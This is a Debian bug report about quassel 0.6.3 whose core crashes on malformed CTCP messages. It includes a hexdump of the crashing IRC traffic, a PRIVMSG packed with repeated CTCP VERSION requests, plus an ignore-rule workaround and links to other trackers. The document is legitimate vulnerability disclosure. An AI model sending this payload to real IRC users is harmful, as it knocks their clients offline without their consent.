Bug#640960: CVE-?????: broken CTCP parsing can be used to crash the core

Timo Juhani Lindfors Thu, 08 Sep 2011 16:00:18 -0700

Package: quassel
Version: 0.6.3-2
Severity: important
Tags: security

When people send me


00000010  75 74 61 73 21 7a 7a 40  31 37 38 2d 33 37 2d 31  |utas!zz@178-37-1|
00000020  30 34 2d 34 32 2e 61 64  73 6c 2e 69 6e 65 74 69  |04-42.adsl.ineti|
00000030  61 2e 70 6c 20 4a 4f 49  4e 20 23 71 75 61 73 73  |a.pl JOIN #quass|
00000040  65 6c 0d 0a 37 36 36 37  30 3a 55 c3 8c a6 5b 7e  |el..76670:U...[~|
00000050  8a 26 3a 6b 75 74 61 73  21 7a 7a 40 31 37 38 2d  |.&:kutas!zz@178-|
00000060  33 37 2d 31 30 34 2d 34  32 2e 61 64 73 6c 2e 69  |37-104-42.adsl.i|
00000070  6e 65 74 69 61 2e 70 6c  20 50 52 49 56 4d 53 47  |netia.pl PRIVMSG|
00000080  20 23 71 75 61 73 73 65  6c 20 3a 01 41 43 54 49  | #quassel :.ACTI|
00000090  4f 4e 20 01 01 56 45 52  53 49 4f 4e 01 01 56 45  |ON ..VERSION..VE|
000000a0  52 53 49 4f 4e 01 01 56  45 52 53 49 4f 4e 01 01  |RSION..VERSION..|
000000b0  56 45 52 53 49 4f 4e 01  01 56 45 52 53 49 4f 4e  |VERSION..VERSION|
000000c0  01 01 56 45 52 53 49 4f  4e 01 01 56 45 52 53 49  |..VERSION..VERSI|
000000d0  4f 4e 01 01 56 45 52 53  49 4f 4e 01 01 56 45 52  |ON..VERSION..VER|
000000e0  53 49 4f 4e 01 01 56 45  52 53 49 4f 4e 01 01 56  |SION..VERSION..V|
000000f0  45 52 53 49 4f 4e 01 01  56 45 52 53 49 4f 4e 01  |ERSION..VERSION.|
00000100  01 56 45 52 53 49 4f 4e  01 01 56 45 52 53 49 4f  |.VERSION..VERSIO|
00000110  4e 01 01 56 45 52 53 49  4f 4e 01 01 56 45 52 53  |N..VERSION..VERS|
00000120  49 4f 4e 01 01 56 45 52  53 49 4f 4e 01 01 56 45  |ION..VERSION..VE|
00000130  52 53 49 4f 4e 01 01 56  45 52 53 49 4f 4e 01 01  |RSION..VERSION..|
00000140  56 45 52 53 49 4f 4e 01  01 56 45 52 53 49 4f 4e  |VERSION..VERSION|
00000150  01 01 56 45 52 53 49 4f  4e 01 01 56 45 52 53 49  |..VERSION..VERSI|
00000160  4f 4e 01 01 56 45 52 53  49 4f 4e 01 01 56 45 52  |ON..VERSION..VER|
00000170  53 49 4f 4e 01 01 56 45  52 53 49 4f 4e 01 01 56  |SION..VERSION..V|
00000180  45 52 53 49 4f 4e 01 01  56 45 52 53 49 4f 4e 01  |ERSION..VERSION.|
00000190  01 56 45 52 53 49 4f 4e  01 01 56 45 52 53 49 4f  |.VERSION..VERSIO|
000001a0  4e 01 01 56 45 52 53 49  4f 4e 01 01 56 45 52 53  |N..VERSION..VERS|
000001b0  49 4f 4e 01 01 56 45 52  53 49 4f 4e 01 01 56 45  |ION..VERSION..VE|
000001c0  52 53 49 4f 4e 01 01 56  45 52 53 49 4f 4e 01 01  |RSION..VERSION..|
000001d0  56 45 52 53 49 4f 4e 01  01 0d 0a                 |VERSION....|

quasselcore crashes. The upstream bug report is

http://bugs.quassel-irc.org/issues/1095

Gentoo bug report is

https://bugs.gentoo.org/382313

(there is some mention about requesting a CVE)

Workaround:

1) Settings->Configure Quassel->IRC->Ignore List->New
2) Strictness: Dynamic
3) Rule Type: CTCP
4) Ignore Rule: * VERSION
5) Scope: Global


Where is the Vcs for quassel? I could prepare a fix.


-- System Information:
Debian Release: 6.0.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages quassel depends on:
ii  dbus-x11            1.2.24-4+squeeze1    simple interprocess messaging syst
ii  gawk                1:3.1.7.dfsg-5       GNU awk, a pattern scanning and pr
ii  libc6               2.11.2-10            Embedded GNU C Library: Shared lib
ii  libgcc1             1:4.4.5-8            GCC support library
ii  libphonon4          4:4.6.0really4.4.2-1 the core library of the Phonon mul
ii  libqt4-dbus         4:4.6.3-4+squeeze1   Qt 4 D-Bus module
ii  libqt4-network      4:4.6.3-4+squeeze1   Qt 4 network module
ii  libqt4-script       4:4.6.3-4+squeeze1   Qt 4 script module
ii  libqt4-sql          4:4.6.3-4+squeeze1   Qt 4 SQL module
ii  libqt4-sql-sqlite   4:4.6.3-4+squeeze1   Qt 4 SQLite 3 database driver
ii  libqt4-webkit       4:4.6.3-4+squeeze1   Qt 4 WebKit module
ii  libqt4-xmlpatterns  4:4.6.3-4+squeeze1   Qt 4 XML patterns module
ii  libqtcore4          4:4.6.3-4+squeeze1   Qt 4 core module
ii  libqtgui4           4:4.6.3-4+squeeze1   Qt 4 GUI module
ii  libstdc++6          4.4.5-8              The GNU Standard C++ Library v3
ii  phonon              4:4.6.0really4.4.2-1 metapackage for the Phonon multime
ii  quassel-data        0.6.3-2              distributed IRC client - shared da

quassel recommends no packages.

quassel suggests no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#640960: CVE-?????: broken CTCP parsing can be used to crash the core

Reply via email to